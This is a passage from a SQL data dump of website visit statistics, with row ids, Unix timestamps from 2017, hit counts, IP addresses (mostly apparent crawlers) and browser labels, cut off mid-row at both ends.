,0,0,'217.182.132.73','other'),(106833,1494000632,1,1,0,0,'137.74.207.116','other'),(106834,1494000665,1,1,0,0,'217.69.133.216','other'),(106835,1494000758,1,1,0,0,'217.69.133.18','other'),(106836,1494000817,1,1,0,0,'164.132.161.45','other'),(106837,1494000962,1,1,0,0,'217.69.133.191','other'),(106838,1494001318,2,2,0,0,'217.182.132.86','other'),(106839,1494001345,1,0,1,0,'66.249.76.107',''),(106840,1494001367,1,1,0,0,'164.132.161.86','other'),(106841,1494002024,1,1,0,0,'164.132.162.188','other'),(106842,1494002202,1,1,0,0,'164.132.161.5','other'),(106843,1494003846,1,1,0,0,'51.255.65.58','other'),(106844,1494004222,1,1,0,0,'8.29.198.25','other'),(106845,1494004308,1,1,0,0,'217.69.133.60','other'),(106846,1494004859,1,1,0,0,'217.69.133.251','other'),(106847,1494005491,1,1,0,0,'217.69.133.225','other'),(106848,1494005882,1,1,0,0,'164.132.161.28','other'),(106849,1494006281,1,1,0,0,'51.255.65.61','other'),(106850,1494006422,1,1,0,0,'217.182.132.28','other'),(106851,1494006492,1,0,1,0,'66.249.66.87',''),(106852,1494006515,1,0,1,0,'66.249.76.27',''),(106853,1494006787,1,1,0,0,'164.132.161.67','other'),(106854,1494007131,1,1,0,0,'176.195.107.232','firefox'),(106855,1494007485,1,1,0,0,'51.255.65.12','other'),(106856,1494007813,2,2,0,0,'141.8.142.134','other'),(106857,1494008093,1,0,1,0,'66.249.76.109',''),(106858,1494008094,1,1,0,0,'217.69.133.229','other'),(106859,1494008325,1,1,0,0,'217.69.133.217','other'),(106860,1494008874,1,1,0,0,'141.8.142.152','other'),(106861,1494008974,1,1,0,0,'91.196.178.168','chrome'),(106862,1494009441,1,1,0,0,'5.255.253.7','other'),(106863,1494009578,1,1,0,0,'51.255.65.12','other'),(106864,1494009640,1,1,0,0,'137.74.207.109','other'),(106865,1494010041,1,1,0,0,'217.69.133.190','other'),(106866,1494010188,1,1,0,0,'217.69.133.13','other'),(106867,1494010190,2,2,0,0,'217.69.133.15','other'),(106868,1494011196,1,0,1,0,'66.249.76.28',''),(106869,1494011209,1,1,0,0,'91.196.178.163','chrome'),(106870,1494011216,1,1,0,0,'217.182.132.78','other'),(106871,1494011337,1,1,0,0,'217.69.133.239','other'),(106872,1494011529,2,2,0,0,'46.201.175.235','chrome'),(106873,1494011553,1,1,0,0,'217.69.136.208','other'),(106874,1494011587,1,1,0,0,'40.77.167.34','other'),(106875,1494011998,1,1,0,0,'217.69.133.227','other'),(106876,1494012060,3,3,0,0,'5.255.253.23','other'),(106877,1494012068,1,1,0,0,'217.69.133.13','other'),(106879,1494012072,1,1,0,0,'91.196.178.133','chrome'),(106880,1494012073,1,1,0,0,'217.182.132.187','other'),(106881,1494012085,1,1,0,0,'141.8.142.50','other'),(106882,1494012093,3,3,0,0,'37.9.113.11','other'),(106883,1494012106,1,1,0,0,'95.108.179.12','other'),(106884,1494012117,2,2,0,0,'5.255.253.54','other'),(106885,1494012130,1,1,0,0,'141.8.142.51','other'),(106886,1494012133,2,2,0,0,'141.8.142.152','other'),(106887,1494012142,1,1,0,0,'5.255.253.37','other'),(106888,1494012210,1,1,0,0,'5.255.253.45','other'),(106889,1494012310,1,0,1,0,'66.249.76.109',''),(106890,1494012497,1,1,0,0,'141.8.142.142','other'),(106891,1494012553,1,1,0,0,'51.255.65.30','other'),(106892,1494012581,1,1,0,0,'5.255.253.27','other'),(106893,1494012673,1,1,0,0,'93.158.152.63','other'),(106894,1494012750,1,1,0,0,'178.154.189.24','other'),(106895,1494012866,1,1,0,0,'5.255.253.7','other'),(106896,1494012871,1,1,0,0,'141.8.142.151','other'),(106897,1494012946,1,1,0,0,'5.255.253.73','other'),(106898,1494013011,1,1,0,0,'5.255.253.19','other'),(106899,1494013156,1,1,0,0,'164.132.161.91','other'),(106900,1494013781,2,0,2,0,'66.249.76.27',''),(106901,1494013869,1,1,0,0,'217.69.133.238','other'),(106902,1494013909,1,1,0,0,'217.182.132.148','other'),(106903,1494014264,1,1,0,0,'217.69.133.4','other'),(106904,1494014458,1,1,0,0,'217.69.133.250','other'),(106905,1494014791,1,1,0,0,'51.255.71.101','other'),(106906,1494014936,1,1,0,0,'217.69.133.229','other'),(106907,1494015045,1,1,0,0,'8.29.198.27','other'),(106908,1494015380,1,1,0,0,'66.249.76.108','chrome'),(106909,1494015412,1,1,0,0,'62.210.101.101','other'),(106910,1494015667,1,0,1,0,'66.249.76.109',''),(106911,1494016039,1,1,0,0,'217.69.133.248','other'),(106912,1494016049,1,1,0,0,'51.255.65.16','other'),(106913,1494016586,2,2,0,0,'91.209.11.236','other'),(106914,1494017136,1,1,0,0,'217.182.132.150','other'),(106915,1494017407,1,1,0,0,'164.132.161.89','other'),(106916,1494018344,1,1,0,0,'217.182.132.93','other'),(106917,1494018365,1,1,0,0,'164.132.161.35','other'),(106918,1494018897,1,1,0,0,'51.255.71.112','other'),(106919,1494019115,1,1,0,0,'217.69.133.240','other'),(106920,1494019351,1,1,0,0,'164.132.161.4','other'),(106921,1494019751,1,0,1,0,'66.249.66.177',''),(106922,1494019917,1,1,0,0,'217.69.133.29','other'),(106923,1494019932,1,1,0,0,'51.255.71.126','other'),(106924,1494019950,1,0,1,0,'68.180.231.24',''),(106925,1494020165,1,1,0,0,'217.69.133.18','other'),(106926,1494020311,1,1,0,0,'51.255.65.69','other'),(106927,1494020381,1,1,0,0,'217.69.136.204','other'),(106928,1494020634,1,1,0,0,'217.182.132.20','other'),(106929,1494020941,1,0,1,0,'66.249.76.28',''),(106930,1494020982,1,0,1,0,'66.249.66.81',''),(106931,1494021085,1,0,1,0,'66.249.76.109',''),(106932,1494021196,1,1,0,0,'217.69.133.4','other'),(106933,1494021499,1,1,0,0,'193.124.186.166','other'),(106934,1494021517,1,0,1,0,'207.46.13.102',''),(106935,1494021715,1,1,0,0,'217.69.133.253','other'),(106936,1494022163,1,1,0,0,'164.132.161.23','other'),(106937,1494022179,1,1,0,0,'217.69.133.216','other'),(106938,1494023531,1,1,0,0,'217.69.133.239','other'),(106939,1494024090,1,1,0,0,'217.69.133.29','other'),(106940,1494024620,1,0,1,0,'68.180.231.24',''),(106941,1494025087,1,1,0,0,'207.46.13.102','other'),(106942,1494025239,1,1,0,0,'217.69.133.219','other'),(106943,1494025641,1,1,0,0,'217.69.133.5','other'),(106944,1494025849,1,1,0,0,'66.249.76.27','chrome'),(106945,1494025878,1,1,0,0,'8.29.198.25','other'),(106946,1494026095,1,0,1,0,'66.249.76.108',''),(106947,1494026579,1,1,0,0,'217.69.133.241','other'),(106948,1494027026,1,1,0,0,'217.69.133.194','other'),(106949,1494027266,1,1,0,0,'217.69.136.209','other'),(106950,1494027801,2,0,2,0,'66.249.76.29',''),(106951,1494027946,1,1,0,0,'217.69.133.224','other'),(106952,1494029531,1,1,0,0,'217.69.133.220','other'),(106953,1494029629,1,1,0,0,'217.69.133.29','other'),(106954,1494029807,1,1,0,0,'217.69.133.250','other'),(106955,1494030600,1,1,0,0,'217.69.133.229','other'),(106956,1494031236,1,1,0,0,'157.55.39.90','other'),(106957,1494032192,1,1,0,0,'91.121.101.78','other'),(106958,1494032650,1,1,0,0,'217.69.133.6','other'),(106959,1494032905,1,1,0,0,'217.69.136.209','other'),(106960,1494033352,1,1,0,0,'217.69.133.227','other'),(106961,1494034112,1,1,0,0,'217.69.136.208','other'),(106962,1494034329,1,1,0,0,'217.69.133.248','other'),(106963,1494034333,1,1,0,0,'217.69.133.251','other'),(106964,1494035044,1,1,0,0,'217.69.133.14','other'),(106965,1494035679,1,1,0,0,'217.69.133.219','other'),(106966,1494035862,1,1,0,0,'217.69.136.208','other'),(106967,1494036246,64,64,0,0,'64.140.169.42','firefox'),(106968,1494036320,1,1,0,0,'51.255.71.129','other'),(106969,1494036676,1,1,0,0,'217.182.132.61','other'),(106970,1494036706,1,1,0,0,'8.29.198.27','other'),(106971,1494036792,1,1,0,0,'207.46.13.102','other'),(106972,1494036835,1,0,1,0,'66.249.76.27',''),(106973,1494036865,1,0,1,0,'66.249.76.29',''),(106974,1494036934,1,1,0,0,'164.132.161.92','other'),(106975,1494036965,1,1,0,0,'217.69.133.12','other'),(106976,1494037347,1,1,0,0,'51.255.71.133','other'),(106977,1494037391,1,1,0,0,'217.182.132.54','other'),(106978,1494037517,1,1,0,0,'217.69.133.222','other'),(106979,1494037736,1,1,0,0,'217.69.133.246','other'),(106980,1494037906,1,1,0,0,'51.255.65.21','other'),(106981,1494038078,1,1,0,0,'217.69.133.30','other'),(106982,1494038094,1,1,0,0,'66.249.76.28','chrome'),(106983,1494038365,1,1,0,0,'217.69.133.203','other'),(106984,1494038788,1,1,0,0,'217.69.133.249','other'),(106985,1494038858,1,0,1,0,'66.249.76.108',''),(106986,1494039142,1,1,0,0,'164.132.161.87','other'),(106987,1494039167,1,1,0,0,'217.69.133.190','other'),(106988,1494039212,1,1,0,0,'217.69.133.233','other'),(106989,1494039225,1,1,0,0,'137.74.207.114','other'),(106990,1494040085,1,1,0,0,'51.255.65.7','other'),(106991,1494040131,1,1,0,0,'137.74.201.100','other'),(106992,1494040181,1,1,0,0,'217.69.133.218','other'),(106993,1494040383,1,0,1,0,'66.249.76.107',''),(106994,1494040564,1,1,0,0,'217.69.133.247','other'),(106995,1494040606,1,1,0,0,'137.74.203.194','other'),(106996,1494040950,1,1,0,0,'217.69.133.191','other'),(106997,1494041239,1,0,1,0,'66.249.76.109',''),(106998,1494041434,1,0,1,0,'66.249.76.28',''),(106999,1494041908,1,1,0,0,'164.132.161.52','other'),(107000,1494042001,1,1,0,0,'51.255.65.45','other'),(107001,1494042547,1,0,1,0,'66.249.76.28',''),(107002,1494042558,1,1,0,0,'217.69.133.217','other'),(107003,1494042583,1,0,1,0,'66.249.66.81',''),(107004,1494042777,1,1,0,0,'217.69.133.253','other'),(107005,1494042829,1,1,0,0,'51.255.65.35','other'),(107006,1494043894,1,1,0,0,'164.132.161.4','other'),(107007,1494044084,1,1,0,0,'164.132.161.37','other'),(107008,1494044375,1,1,0,0,'217.182.132.85','other'),(107009,1494044616,1,1,0,0,'164.132.161.66','other'),(107010,1494044652,1,1,0,0,'164.132.161.94','other'),(107011,1494045038,1,1,0,0,'164.132.161.40','other'),(107012,1494045489,1,1,0,0,'51.255.65.45','other'),(107013,1494046569,1,1,0,0,'217.182.132.186','other'),(107014,1494047365,1,1,0,0,'66.249.76.107','chrome'),(107015,1494047485,1,1,0,0,'207.46.13.102','other'),(107016,1494047535,1,1,0,0,'8.29.198.27','other'),(107017,1494047630,1,1,0,0,'217.69.133.2','other'),(107018,1494047661,1,1,0,0,'164.132.161.44','other'),(107019,1494048359,1,1,0,0,'51.255.65.50','other'),(107020,1494048448,1,1,0,0,'217.69.133.13','other'),(107021,1494048478,1,1,0,0,'51.255.71.101','other'),(107022,1494048557,1,1,0,0,'217.69.133.72','other'),(107023,1494048598,1,1,0,0,'51.255.71.118','other'),(107024,1494048689,1,1,0,0,'164.132.161.20','other'),(107025,1494048832,1,1,0,0,'217.182.132.65','other'),(107026,1494049273,1,1,0,0,'51.255.65.23','other'),(107027,1494049323,1,1,0,0,'217.182.132.147','other'),(107028,1494049540,1,1,0,0,'164.132.161.31','other'),(107029,1494049579,1,1,0,0,'164.132.161.92','other'),(107030,1494049671,1,1,0,0,'137.74.207.159','other'),(107031,1494049758,1,1,0,0,'51.255.71.121','other'),(107032,1494049761,1,1,0,0,'164.132.162.164','other'),(107033,1494049919,2,0,2,0,'66.249.76.28',''),(107034,1494049964,1,0,1,0,'66.249.66.180',''),(107035,1494050120,1,1,0,0,'164.132.161.36','other'),(107036,1494050177,1,1,0,0,'5.255.253.16','other'),(107037,1494050591,1,1,0,0,'217.182.132.151','other'),(107038,1494050882,1,1,0,0,'217.182.132.188','other'),(107040,1494050943,1,1,0,0,'5.255.253.66','other'),(107041,1494050947,2,2,0,0,'178.154.189.10','other'),(107042,1494051049,1,1,0,0,'141.8.142.170','other'),(107043,1494051075,1,1,0,0,'141.8.142.51','other'),(107044,1494051184,1,1,0,0,'51.255.65.21','other'),(107045,1494051571,2,2,0,0,'134.249.49.53','other'),(107046,1494051712,1,1,0,0,'51.255.71.100','other'),(107047,1494051814,1,1,0,0,'94.178.6.16','chrome'),(107048,1494051874,1,1,0,0,'51.255.65.70','other'),(107049,1494052007,1,1,0,0,'66.102.9.25','chrome'),(107050,1494053113,1,1,0,0,'141.8.142.50','other'),(107051,1494053117,1,1,0,0,'141.8.142.39','other'),(107052,1494053120,1,1,0,0,'5.255.253.45','other'),(107053,1494053417,1,1,0,0,'217.182.132.20','other'),(107054,1494053546,1,1,0,0,'164.132.161.97','other'),(107055,1494053672,1,1,0,0,'51.255.65.94','other'),(107056,1494053747,1,1,0,0,'217.182.132.68','other'),(107057,1494053760,1,1,0,0,'51.255.71.113','other'),(107058,1494054143,1,1,0,0,'164.132.161.84','other'),(107059,1494054300,1,0,1,0,'68.180.228.49',''),(107060,1494054711,1,0,1,0,'66.249.66.183',''),(107061,1494055557,1,1,0,0,'178.255.215.94','other'),(107062,1494055622,1,1,0,0,'51.255.65.87','other'),(107063,1494055798,1,1,0,0,'37.54.21.157','chrome'),(107064,1494056168,1,1,0,0,'217.69.133.250','other'),(107065,1494056288,1,0,1,0,'66.249.76.27',''),(107066,1494056406,1,1,0,0,'5.255.253.37','other'),(107067,1494056460,1,1,0,0,'217.69.133.70','other'),(107068,1494057001,1,1,0,0,'51.255.65.84','other'),(107069,1494057113,1,1,0,0,'217.69.133.72','other'),(107070,1494057745,1,0,1,0,'66.249.76.29',''),(107071,1494057807,2,0,2,0,'66.249.76.28',''),(107072,1494057838,1,1,0,0,'37.9.113.16','other'),(107073,1494057841,1,1,0,0,'95.108.179.12','other'),(107074,1494057844,1,1,0,0,'141.8.142.39','other'),(107075,1494057875,1,1,0,0,'141.8.142.134','other'),(107076,1494057905,1,1,0,0,'216.244.66.237','other'),(107077,1494057964,1,1,0,0,'157.55.39.90','other'),(107078,1494058261,1,1,0,0,'178.154.189.10','other'),(107079,1494058264,1,1,0,0,'141.8.142.152','other'),(107080,1494058298,1,1,0,0,'217.69.133.252','other'),(107081,1494058343,5,5,0,0,'91.121.109.55','other'),(107082,1494058359,1,1,0,0,'8.29.198.25','other'),(107083,1494058408,1,1,0,0,'180.76.15.30','other'),(107084,1494058528,1,1,0,0,'164.132.161.4','other'),(107085,1494058558,1,1,0,0,'164.132.161.54','other'),(107086,1494059019,1,1,0,0,'51.255.65.10','other'),(107087,1494059072,1,1,0,0,'46.165.197.141','other'),(107088,1494059173,1,0,1,0,'157.55.39.90',''),(107089,1494059254,1,0,1,0,'66.249.76.107',''),(107090,1494059280,1,1,0,0,'217.182.132.24','other'),(107091,1494059554,1,1,0,0,'51.255.65.39','other'),(107092,1494059678,1,0,1,0,'66.249.76.109',''),(107093,1494059997,1,1,0,0,'217.182.132.50','other'),(107094,1494060978,1,1,0,0,'91.209.11.236','other'),(107095,1494061517,1,1,0,0,'51.255.65.38','other'),(107096,1494061599,1,1,0,0,'217.182.132.73','other'),(107097,1494062048,6,6,0,0,'136.243.68.226','other'),(107098,1494062105,1,1,0,0,'5.255.253.27','other'),(107099,1494062111,1,1,0,0,'141.8.142.74','other'),(107100,1494062781,1,1,0,0,'164.132.161.35','other'),(107101,1494063035,1,1,0,0,'51.255.65.53','other'),(107102,1494063168,1,1,0,0,'217.69.143.217','firefox'),(107103,1494063260,1,1,0,0,'164.132.161.96','other'),(107104,1494063396,1,0,1,0,'66.249.76.109',''),(107105,1494063480,1,1,0,0,'217.182.132.71','other'),(107106,1494064335,1,1,0,0,'37.9.113.11','other'),(107107,1494064508,2,2,0,0,'141.8.142.51','other'),(107108,1494064798,1,1,0,0,'217.69.133.237','other'),(107109,1494064802,1,1,0,0,'217.69.133.240','other'),(107110,1494065265,1,1,0,0,'5.255.253.37','other'),(107111,1494065325,1,1,0,0,'5.255.253.54','other'),(107112,1494065494,2,2,0,0,'141.8.142.39','other'),(107113,1494065533,1,0,1,0,'66.249.76.28',''),(107114,1494065555,1,1,0,0,'5.255.253.33','other'),(107115,1494065557,1,0,1,0,'66.249.76.27',''),(107116,1494065651,2,2,0,0,'95.108.179.17','other'),(107117,1494065729,1,1,0,0,'141.8.142.50','other'),(107118,1494065772,2,2,0,0,'178.154.189.10','other'),(107119,1494065886,1,1,0,0,'141.8.142.170','other'),(107120,1494065921,1,1,0,0,'141.8.142.152','other'),(107121,1494065955,1,1,0,0,'141.8.142.70','other'),(107122,1494066006,1,1,0,0,'141.8.142.74','other'),(107123,1494066008,1,1,0,0,'5.255.253.66','other'),(107124,1494066049,1,1,0,0,'164.132.162.187','other'),(107125,1494066068,1,1,0,0,'5.255.253.45','other'),(107126,1494066130,1,1,0,0,'37.9.113.15','other'),(107127,1494066151,2,2,0,0,'37.9.113.11','other'),(107128,1494066214,1,1,0,0,'5.255.253.37','other'),(107129,1494066242,1,0,1,0,'66.249.76.29',''),(107130,1494066249,1,1,0,0,'37.9.113.16','other'),(107131,1494066252,1,1,0,0,'141.8.142.134','other'),(107132,1494066257,2,2,0,0,'5.255.253.46','other'),(107133,1494066383,1,0,1,0,'66.249.76.109',''),(107134,1494066645,1,1,0,0,'66.249.76.107','chrome'),(107135,1494066985,1,1,0,0,'5.255.253.54','other'),(107136,1494067018,1,1,0,0,'178.154.189.10','other'),(107137,1494067020,1,1,0,0,'5.255.253.16','other'),(107138,1494067151,1,1,0,0,'164.132.161.94','other'),(107139,1494067487,1,1,0,0,'51.255.65.7','other'),(107140,1494067819,1,1,0,0,'217.69.133.230','other'),(107141,1494067876,1,1,0,0,'130.180.217.74','firefox'),(107142,1494068009,1,1,0,0,'95.108.179.17','other'),(107143,1494068014,1,1,0,0,'5.255.253.34','other'),(107144,1494068059,1,1,0,0,'141.8.142.39','other'),(107145,1494069053,1,0,1,0,'207.46.13.93',''),(107146,1494069187,1,1,0,0,'8.29.198.25','other'),(107147,1494069294,1,0,1,0,'66.249.76.107',''),(107148,1494069462,1,1,0,0,'193.194.127.217','firefox'),(107149,1494069474,1,1,0,0,'207.46.13.93','other'),(107150,1494069580,1,1,0,0,'217.69.133.234','other'),(107151,1494069980,2,0,2,0,'66.249.76.27',''),(107152,1494070536,1,1,0,0,'217.182.132.174','other'),(107153,1494070550,1,1,0,0,'5.255.253.46','other'),(107154,1494070598,21,21,0,0,'208.43.225.84','other'),(107155,1494070655,20,20,0,0,'208.43.225.85','other'),(107156,1494070682,1,1,0,0,'217.182.132.187','other'),(107157,1494070840,1,1,0,0,'37.9.113.16','other'),(107158,1494071205,1,1,0,0,'217.182.132.170','other'),(107159,1494071306,1,1,0,0,'164.132.161.82','other'),(107160,1494071497,1,1,0,0,'176.31.231.10','other'),(107161,1494071513,1,1,0,0,'51.255.65.9','other'),(107162,1494072245,1,1,0,0,'51.255.65.24','other'),(107163,1494072304,1,1,0,0,'217.69.133.243','other'),(107164,1494072515,1,1,0,0,'51.255.65.42','other'),(107165,1494072896,1,1,0,0,'51.255.65.29','other'),(107166,1494073463,1,1,0,0,'51.255.65.80','other'),(107167,1494073567,1,0,1,0,'66.249.76.107',''),(107168,1494073930,1,1,0,0,'180.76.15.12','other'),(107169,1494073993,1,1,0,0,'51.255.65.11','other'),(107170,1494074121,1,1,0,0,'51.255.71.131','other'),(107171,1494074441,2,2,0,0,'164.132.161.71','other'),(107172,1494074469,1,1,0,0,'51.255.65.65','other'),(107173,1494074729,1,1,0,0,'51.255.65.40','other'),(107174,1494075419,1,1,0,0,'51.255.65.55','other'),(107175,1494076801,1,1,0,0,'164.132.161.92','other'),(107176,1494077173,1,0,1,0,'66.249.76.28',''),(107177,1494077319,1,1,0,0,'51.255.71.121','other'),(107178,1494077551,1,1,0,0,'164.132.161.78','other'),(107179,1494077583,1,1,0,0,'217.182.132.183','other'),(107180,1494078084,1,1,0,0,'141.8.142.134','other'),(107181,1494078154,1,1,0,0,'141.8.142.142','other'),(107182,1494078202,1,1,0,0,'5.255.253.16','other'),(107183,1494078233,1,1,0,0,'141.8.142.50','other'),(107184,1494078245,1,0,1,0,'66.249.66.84',''),(107185,1494078264,1,1,0,0,'95.108.179.17','other'),(107186,1494078537,1,0,1,0,'66.249.66.81',''),(107187,1494078876,1,1,0,0,'217.182.132.90','other'),(107188,1494079002,1,1,0,0,'51.255.71.113','other'),(107189,1494079145,1,1,0,0,'51.255.65.41','other'),(107190,1494079230,1,1,0,0,'164.132.161.79','other'),(107191,1494079560,1,1,0,0,'51.255.64.106','other'),(107192,1494079584,1,1,0,0,'51.255.65.28','other'),(107193,1494079879,1,0,1,0,'66.249.76.29',''),(107194,1494080015,1,1,0,0,'8.29.198.27','other'),(107195,1494080021,1,1,0,0,'217.182.132.182','other'),(107196,1494080183,1,1,0,0,'51.255.65.65','other'),(107197,1494080444,1,1,0,0,'176.31.231.10','other'),(107198,1494080471,1,0,1,0,'66.249.66.183',''),(107199,1494080974,1,1,0,0,'217.182.132.78','other'),(107200,1494081261,1,1,0,0,'207.46.13.93','other'),(107201,1494081680,1,1,0,0,'164.132.161.78','other'),(107202,1494082001,1,1,0,0,'51.255.65.31','other'),(107203,1494082518,1,1,0,0,'164.132.161.57','other'),(107204,1494082620,1,1,0,0,'164.132.161.8','other'),(107205,1494083370,1,1,0,0,'157.55.39.90','other'),(107206,1494083434,1,1,0,0,'164.132.161.75','other'),(107207,1494083505,1,1,0,0,'164.132.161.16','other'),(107208,1494083648,1,1,0,0,'91.196.178.68','opera'),(107209,1494083711,1,0,1,0,'66.249.76.109',''),(107210,1494084194,1,1,0,0,'176.31.231.10','other'),(107211,1494084299,1,1,0,0,'141.8.142.170','other'),(107212,1494084432,1,1,0,0,'217.182.132.149','other'),(107213,1494084676,1,0,1,0,'66.249.76.28',''),(107214,1494085083,1,1,0,0,'217.182.132.60','other'),(107215,1494085564,1,1,0,0,'217.182.132.149','other'),(107216,1494085734,1,1,0,0,'51.255.71.118','other'),(107217,1494085747,1,1,0,0,'217.182.132.150','other'),(107218,1494085774,1,0,1,0,'66.249.76.108',''),(107219,1494085875,1,1,0,0,'217.182.132.76','other'),(107220,1494086214,1,1,0,0,'164.132.161.59','other'),(107221,1494086594,1,1,0,0,'164.132.161.36','other'),(107222,1494086930,1,1,0,0,'37.9.113.16','other'),(107223,1494086970,1,1,0,0,'83.22.123.211','chrome'),(107224,1494087281,1,1,0,0,'51.255.65.4','other'),(107225,1494087515,1,1,0,0,'151.80.27.118','other'),(107226,1494087563,1,1,0,0,'51.255.65.49','other'),(107227,1494087627,1,1,0,0,'51.255.71.112','other'),(107228,1494087706,1,1,0,0,'51.255.65.77','other'),(107229,1494087909,1,1,0,0,'164.132.161.68','other'),(107230,1494088107,1,1,0,0,'217.182.132.16','other'),(107231,1494088227,1,1,0,0,'164.132.161.50','other'),(107232,1494088408,1,1,0,0,'217.182.132.80','other'),(107233,1494088648,1,1,0,0,'217.182.132.87','other'),(107234,1494088706,1,1,0,0,'217.182.132.76','other'),(107235,1494089609,1,1,0,0,'51.255.71.123','other'),(107236,1494089869,1,0,1,0,'66.249.66.180',''),(107237,1494089978,4,0,4,0,'66.249.76.28',''),(107238,1494089996,1,0,1,0,'66.249.76.107',''),(107239,1494090284,1,1,0,0,'164.132.162.153','other'),(107240,1494090781,1,0,1,0,'66.249.66.84',''),(107241,1494090837,1,1,0,0,'8.29.198.25','other'),(107242,1494091459,1,1,0,0,'164.132.161.40','other'),(107243,1494091893,1,1,0,0,'216.244.66.237','other'),(107244,1494092082,1,1,0,0,'217.182.132.34','other'),(107245,1494092085,1,1,0,0,'164.132.161.8','other'),(107246,1494092313,1,1,0,0,'217.182.132.21','other'),(107247,1494092364,1,0,1,0,'68.180.231.24',''),(107248,1494092588,1,1,0,0,'217.182.132.146','other'),(107249,1494092721,1,1,0,0,'217.182.132.193','other'),(107250,1494092968,1,1,0,0,'137.74.207.109','other'),(107251,1494093146,1,1,0,0,'51.255.71.127','other'),(107252,1494093638,1,1,0,0,'94.231.180.166','chrome'),(107253,1494093943,1,1,0,0,'217.182.132.22','other'),(107254,1494094093,3,3,0,0,'141.8.142.134','other'),(107255,1494094465,1,1,0,0,'217.182.132.188','other'),(107256,1494094483,7,7,0,0,'5.255.253.54','other'),(107257,1494094537,4,4,0,0,'37.9.113.11','other'),(107258,1494094680,5,5,0,0,'141.8.142.152','other'),(107259,1494094798,1,1,0,0,'5.255.253.27','other'),(107260,1494094829,1,1,0,0,'91.196.178.166','chrome'),(107261,1494095039,4,4,0,0,'141.8.142.134','other'),(107262,1494095056,3,3,0,0,'5.255.253.45','other'),(107263,1494095060,1,1,0,0,'93.158.152.14','other'),(107264,1494095065,2,2,0,0,'141.8.142.50','other'),(107265,1494095108,1,1,0,0,'141.8.142.170','other'),(107266,1494095125,1,1,0,0,'5.255.253.75','other'),(107267,1494095134,2,2,0,0,'5.255.253.37','other'),(107268,1494095188,1,1,0,0,'5.255.253.23','other'),(107269,1494095243,1,1,0,0,'164.132.161.3','other'),(107270,1494095385,1,1,0,0,'5.255.253.66','other'),(107271,1494095446,1,1,0,0,'5.255.253.54','other'),(107272,1494095520,1,1,0,0,'91.196.178.102','chrome'),(107273,1494096591,1,1,0,0,'91.196.178.102','chrome'),(107274,1494096729,1,1,0,0,'164.132.161.49','other'),(107275,1494096760,2,2,0,0,'141.8.142.134','other'),(107276,1494096778,1,1,0,0,'37.9.113.11','other'),(107277,1494096865,1,1,0,0,'164.132.161.22','other'),(107278,1494096977,1,1,0,0,'51.255.71.130','other'),(107279,1494097036,1,1,0,0,'51.255.65.62','other'),(107280,1494097161,1,1,0,0,'137.74.207.188','other'),(107281,1494097518,1,0,1,0,'66.249.76.109',''),(107282,1494097721,1,1,0,0,'217.182.132.32','other'),(107283,1494098009,1,1,0,0,'164.132.162.164','other'),(107284,1494098059,2,2,0,0,'5.255.253.54','other'),(107285,1494098081,1,1,0,0,'141.8.142.70','other'),(107286,1494098087,1,1,0,0,'37.9.113.11','other'),(107287,1494098090,1,1,0,0,'5.255.253.45','other'),(107288,1494098093,1,1,0,0,'141.8.142.170','other'),(107289,1494098102,1,1,0,0,'5.255.253.75','other'),(107290,1494098113,2,2,0,0,'51.255.65.47','other'),(107291,1494098119,1,1,0,0,'5.255.253.46','other'),(107292,1494098241,1,1,0,0,'217.182.132.52','other'),(107293,1494098410,1,0,1,0,'66.249.76.107',''),(107294,1494099139,1,1,0,0,'141.8.142.170','other'),(107295,1494099153,1,1,0,0,'178.154.189.10','other'),(107296,1494099716,1,1,0,0,'51.255.65.76','other'),(107297,1494100121,1,1,0,0,'51.255.65.44','other'),(107298,1494100203,1,0,1,0,'66.249.76.107',''),(107299,1494100962,1,1,0,0,'207.46.13.102','other'),(107300,1494101237,1,1,0,0,'164.132.161.25','other'),(107301,1494101668,1,1,0,0,'8.29.198.26','other'),(107302,1494101782,1,1,0,0,'5.255.253.27','other'),(107303,1494101930,1,1,0,0,'178.137.208.179','firefox'),(107304,1494103283,1,1,0,0,'51.255.65.60','other'),(107305,1494103519,1,0,1,0,'66.249.66.183',''),(107306,1494103973,1,1,0,0,'51.255.71.132','other'),(107307,1494104372,1,1,0,0,'164.132.161.41','other'),(107308,1494104642,1,1,0,0,'51.255.71.117','other'),(107309,1494104680,1,0,1,0,'66.249.76.28',''),(107310,1494104828,1,1,0,0,'164.132.161.77','other'),(107311,1494105055,2,1,1,0,'207.46.13.93',''),(107312,1494105177,1,1,0,0,'137.74.207.102','other'),(107313,1494106120,1,1,0,0,'164.132.161.78','other'),(107314,1494106147,1,1,0,0,'164.132.162.157','other'),(107315,1494106408,2,0,2,0,'66.249.76.28',''),(107316,1494106438,1,1,0,0,'51.255.65.92','other'),(107317,1494107054,1,1,0,0,'176.31.231.10','other'),(107318,1494107485,1,0,1,0,'66.249.66.84',''),(107319,1494107821,1,1,0,0,'164.132.161.50','other'),(107320,1494108200,1,0,1,0,'66.249.76.109',''),(107321,1494108864,1,1,0,0,'51.255.65.83','other'),(107322,1494109158,1,1,0,0,'40.77.167.34','other'),(107323,1494109563,1,1,0,0,'164.132.164.180','other'),(107324,1494109685,1,1,0,0,'51.255.65.89','other'),(107325,1494110160,1,1,0,0,'164.132.161.73','other'),(107326,1494110326,1,1,0,0,'164.132.161.96','other'),(107327,1494110413,1,1,0,0,'51.255.71.132','other'),(107328,1494110425,1,1,0,0,'51.255.65.69','other'),(107329,1494110684,1,1,0,0,'180.76.15.29','other'),(107330,1494111314,1,1,0,0,'217.182.132.73','other'),(107331,1494111401,1,1,0,0,'51.255.71.118','other'),(107332,1494111618,1,1,0,0,'164.132.161.45','other'),(107333,1494111757,1,1,0,0,'217.182.132.55','other'),(107334,1494111790,1,1,0,0,'164.132.161.64','other'),(107335,1494112207,1,1,0,0,'217.182.132.190','other'),(107336,1494112395,1,0,1,0,'66.249.76.28',''),(107337,1494112420,1,1,0,0,'137.74.207.114','other'),(107338,1494112494,1,1,0,0,'8.29.198.25','other'),(107339,1494112511,1,1,0,0,'51.255.71.113','other'),(107340,1494112818,1,1,0,0,'164.132.161.51','other'),(107341,1494113354,1,1,0,0,'164.132.161.53','other'),(107342,1494113588,1,0,1,0,'66.249.76.107',''),(107343,1494113753,1,1,0,0,'51.255.65.91','other'),(107344,1494114159,1,1,0,0,'51.255.71.113','other'),(107345,1494114176,1,1,0,0,'51.255.65.66','other'),(107346,1494114261,1,1,0,0,'217.182.132.56','other'),(107347,1494115157,1,1,0,0,'51.255.65.51','other'),(107348,1494115230,1,1,0,0,'51.255.65.45','other'),(107349,1494116763,1,1,0,0,'164.132.162.153','other'),(107350,1494116976,1,1,0,0,'164.132.161.41','other'),(107351,1494117492,1,1,0,0,'164.132.161.17','other'),(107352,1494117557,1,